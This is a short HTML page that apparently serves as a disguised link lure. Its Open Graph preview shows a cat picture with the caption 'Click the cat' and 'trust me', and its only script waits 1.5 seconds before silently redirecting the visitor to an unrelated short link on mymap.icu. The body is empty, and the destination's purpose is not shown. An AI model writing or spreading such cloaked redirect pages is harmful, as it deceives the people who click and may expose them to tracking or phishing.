<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">

  <!-- Open Graph -->
  <meta property="og:title" content="🐱 Click the cat">
  <meta property="og:description" content="trust me 👀">
  <meta property="og:image" content="https://cygear.github.io/im/cat.png">
  <meta property="og:url" content="https://cygear.github.io/im/">
  <meta property="og:type" content="website">

  <!-- IMPORTANT: delay redirect -->
  <script>
    setTimeout(() => {
      window.location.replace("https://mymap.icu/DIJFIK");
    }, 1500);
  </script>
</head>
<body>
</body>
</html>
